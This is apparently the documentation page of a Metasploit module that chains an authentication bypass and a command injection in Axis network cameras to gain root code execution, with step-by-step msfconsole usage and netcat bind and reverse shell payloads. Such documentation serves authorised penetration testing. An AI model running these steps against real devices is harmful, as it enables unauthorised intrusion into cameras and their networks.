26 lines
960 B
Markdown
26 lines
960 B
Markdown
|
This module exploits multiple vulnerabilities against Axis Network Cameras, including an authentication
|
||
|
|
bypass in the .srv functionality, as well as a command injection in "parhand", in order to gain
|
||
|
|
arbitrary remote code execution under the context of root.
|
||
|
|
|
||
|
|
The exploit currently only supports the following payloads:
|
||
|
|
|
||
|
|
* cmd/unix/bind_netcat_gaping
|
||
|
|
* cmd/unix/reverse_netcat_gaping
|
||
|
|
|
||
|
|
## Vulnerable Application
|
||
|
|
|
||
|
|
The particular firmware (Companion Dome V) tested for this exploit was 6.15.4, web version 16.05.02.
|
||
|
|
|
||
|
|
For a list of affected Axis products, please go to the following page:
|
||
|
|
https://www.axis.com/files/sales/ACV-128401_Affected_Product_List.pdf
|
||
|
|
|
||
|
|
## Verification Steps
|
||
|
|
|
||
|
|
1. Start msfconsole
|
||
|
|
2. Do: `exploit/linux/http/axis_srv_parhand_rce`
|
||
|
|
3. Do: `set rhosts [IP]`
|
||
|
|
4. Do: `show payloads` to select a payload (that is not ipv6)
|
||
|
|
5. Do: `set payload [name of payload]`
|
||
|
|
6. Set LHOST if you are using a reverse shell
|
||
|
|
7. Do: `run`
|
||
|
|
8. You should get a session
|